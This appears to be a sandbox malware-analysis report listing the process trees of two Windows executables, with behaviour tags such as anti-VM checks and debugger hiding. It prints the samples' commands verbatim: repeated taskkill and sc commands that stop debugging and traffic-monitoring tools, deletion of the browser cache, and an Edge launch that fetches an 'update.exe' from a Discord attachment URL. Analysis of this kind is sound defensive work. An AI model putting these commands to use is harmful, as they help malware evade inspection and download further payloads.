C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5756 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5948 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6092 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6220 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6296 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6344 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5736 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6116 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5872 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3020 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:12⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\K4F80D1AI28Y.exe"C:\Users\Admin\AppData\Local\Temp\K4F80D1AI28Y.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\K4F80D1AI28Y.exe" MD5 | find /i /v "md5" | find /i /v "certutil"2⤵
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\K4F80D1AI28Y.exe" MD53⤵
- Loads dropped DLL
-
C:\Windows\system32\find.exefind /i /v "certutil"3⤵
-
C:\Windows\system32\find.exefind /i /v "md5"3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/920160935023362120/1016575229683834940/update.exe2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbeb9746f8,0x7ffbeb974708,0x7ffbeb9747183⤵
-
C:\Users\Admin\Downloads\J0BK7JPSO0QL.exe"C:\Users\Admin\Downloads\J0BK7JPSO0QL.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
-
